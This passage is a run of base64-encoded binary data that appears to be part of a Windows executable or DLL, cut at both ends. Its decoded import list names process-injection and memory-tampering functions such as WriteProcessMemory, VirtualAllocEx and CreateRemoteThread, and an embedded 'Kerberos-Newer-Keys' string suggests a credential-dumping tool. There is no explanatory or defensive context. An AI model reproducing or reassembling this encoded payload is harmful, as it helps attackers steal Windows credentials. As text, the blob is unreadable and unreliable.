ZpbmROZXh0RmlsZVcAHQFFeHBhbmRFbnZpcm9ubWVudFN0cmluZ3NXAC4BRmluZENsb3NlAOoBR2V0RmlsZUF0dHJpYnV0ZXNXAAC/AUdldEN1cnJlbnREaXJlY3RvcnlXAABXAUZsdXNoRmlsZUJ1ZmZlcnMAAMABR2V0Q3VycmVudFByb2Nlc3MA6ABEdXBsaWNhdGVIYW5kbGUAgANPcGVuUHJvY2VzcwDdAERldmljZUlvQ29udHJvbAAuBVdyaXRlUHJvY2Vzc01lbW9yeQAA7wRWaXJ0dWFsUHJvdGVjdAAA7ARWaXJ0dWFsRnJlZQDpBFZpcnR1YWxBbGxvYwAAZgRTZXRGaWxlUG9pbnRlcgAA8ARWaXJ0dWFsUHJvdGVjdEV4AADqBFZpcnR1YWxBbGxvY0V4AADDA1JlYWRQcm9jZXNzTWVtb3J5AO0EVmlydHVhbEZyZWVFeADxBFZpcnR1YWxRdWVyeQAA8gRWaXJ0dWFsUXVlcnlFeAAA1gRVbm1hcFZpZXdPZkZpbGUAjABDcmVhdGVGaWxlTWFwcGluZ1cAAFcDTWFwVmlld09mRmlsZQBLA0xvY2FsUmVBbGxvYwAAqABDcmVhdGVQcm9jZXNzVwAAcwRTZXRMYXN0RXJyb3IAAPkEV2FpdEZvclNpbmdsZU9iamVjdACpAENyZWF0ZVJlbW90ZVRocmVhZAAAJAFGaWxlVGltZVRvTG9jYWxGaWxlVGltZQCXAkdldFRpbWVGb3JtYXRXAAARBVdpZGVDaGFyVG9NdWx0aUJ5dGUAyAFHZXREYXRlRm9ybWF0VwAAFQBBcmVGaWxlQXBpc0FOU0kAzgRUcnlFbnRlckNyaXRpY2FsU2VjdGlvbgDNAkhlYXBDcmVhdGUAAM8CSGVhcEZyZWUAAO4ARW50ZXJDcml0aWNhbFNlY3Rpb24AAPsBR2V0RnVsbFBhdGhOYW1lVwAA6QJJbnRlcmxvY2tlZENvbXBhcmVFeGNoYW5nZQAAzwFHZXREaXNrRnJlZVNwYWNlVwCJA091dHB1dERlYnVnU3RyaW5nQQAAUgNMb2NrRmlsZQAAOQNMZWF2ZUNyaXRpY2FsU2VjdGlvbgAA4gJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAPgBR2V0RnVsbFBhdGhOYW1lQQAAUwRTZXRFbmRPZkZpbGUAANUEVW5sb2NrRmlsZUV4AACFAkdldFRlbXBQYXRoVwAAngBDcmVhdGVNdXRleFcAAKQCR2V0VmVyc2lvbkV4VwDXAkhlYXBWYWxpZGF0ZQAA1AJIZWFwU2l6ZQAAZwNNdWx0aUJ5dGVUb1dpZGVDaGFyAIQCR2V0VGVtcFBhdGhBAABeAUZvcm1hdE1lc3NhZ2VXAADMAUdldERpc2tGcmVlU3BhY2VBAOUBR2V0RmlsZUF0dHJpYnV0ZXNBAADnAUdldEZpbGVBdHRyaWJ1dGVzRXhXAACKA091dHB1dERlYnVnU3RyaW5nVwAAWgFGbHVzaFZpZXdPZkZpbGUAiABDcmVhdGVGaWxlQQD6BFdhaXRGb3JTaW5nbGVPYmplY3RFeACjAkdldFZlcnNpb25FeEEA0wBEZWxldGVGaWxlQQDWAERlbGV0ZUZpbGVXANICSGVhcFJlQWxsb2MAcwJHZXRTeXN0ZW1JbmZvAMsCSGVhcEFsbG9jAMwCSGVhcENvbXBhY3QAzgJIZWFwRGVzdHJveQDUBFVubG9ja0ZpbGUAAIkAQ3JlYXRlRmlsZU1hcHBpbmdBAABTA0xvY2tGaWxlRXgAAPABR2V0RmlsZVNpemUA0QBEZWxldGVDcml0aWNhbFNlY3Rpb24AwQFHZXRDdXJyZW50UHJvY2Vzc0lkAEoCR2V0UHJvY2Vzc0hlYXAAAL0EU3lzdGVtVGltZVRvRmlsZVRpbWUAAHkCR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAdwJHZXRTeXN0ZW1UaW1lAF0BRm9ybWF0TWVzc2FnZUEAAKcDUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAkwJHZXRUaWNrQ291bnQAAD8DTG9hZExpYnJhcnlXAABFAkdldFByb2NBZGRyZXNzAABiAUZyZWVMaWJyYXJ5ABgCR2V0TW9kdWxlSGFuZGxlVwAAsgFHZXRDb25zb2xlU2NyZWVuQnVmZmVySW5mbwAAZAJHZXRTdGRIYW5kbGUAAJgCR2V0VGltZVpvbmVJbmZvcm1hdGlvbgAAKAFGaWxsQ29uc29sZU91dHB1dENoYXJhY3RlclcATQRTZXRDdXJyZW50RGlyZWN0b3J5VwAAMQRTZXRDb25zb2xlQ3Vyc29yUG9zaXRpb24AAA4DSXNXb3c2NFByb2Nlc3MAAMQBR2V0Q3VycmVudFRocmVhZAAAxQFHZXRDdXJyZW50VGhyZWFkSWQAAOcCSW5pdGlhbGl6ZVNMaXN0SGVhZAAAA0lzRGVidWdnZXJQcmVzZW50ANMEVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAAClBFNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgBjAkdldFN0YXJ0dXBJbmZvVwAEA0lzUHJvY2Vzc29yRmVhdHVyZVByZXNlbnQAwARUZXJtaW5hdGVQcm9jZXNzAABLRVJORUwzMi5kbGwAAO4CSW50ZXJsb2NrZWRGbHVzaFNMaXN0ABgEUnRsVW53aW5kAOMCSW5pdGlhbGl6ZUNyaXRpY2FsU2VjdGlvbkFuZFNwaW5Db3VudADFBFRsc0FsbG9jAADHBFRsc0dldFZhbHVlAMgEVGxzU2V0VmFsdWUAxgRUbHNGcmVlAD4DTG9hZExpYnJhcnlFeFcAAIYBR2V0Q29tbWFuZExpbmVBAIcBR2V0Q29tbWFuZExpbmVXABkBRXhpdFByb2Nlc3MAFwJHZXRNb2R1bGVIYW5kbGVFeFcAABMCR2V0TW9kdWxlRmlsZU5hbWVBAABoAUdldEFDUAAA8wFHZXRGaWxlVHlwZQBkAENvbXBhcmVTdHJpbmdXAAAtA0xDTWFwU3RyaW5nVwAAmgFHZXRDb25zb2xlQ1AAAKwBR2V0Q29uc29sZU1vZGUAAIcEU2V0U3RkSGFuZGxlAABpAkdldFN0cmluZ1R5cGVXAAAzAUZpbmRGaXJzdEZpbGVFeEEAAEMBRmluZE5leHRGaWxlQQAKA0lzVmFsaWRDb2RlUGFnZQA3AkdldE9FTUNQAAByAUdldENQSW5mbwDaAUdldEVudmlyb25tZW50U3RyaW5nc1cAAGEBRnJlZUVudmlyb25tZW50U3RyaW5nc1cAVgRTZXRFbnZpcm9ubWVudFZhcmlhYmxlQQBnBFNldEZpbGVQb2ludGVyRXgAACQFV3JpdGVDb25zb2xlVwC+A1JlYWRDb25zb2xlVwAAygBEZWNvZGVQb2ludGVyALEDUmFpc2VFeGNlcHRpb24AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP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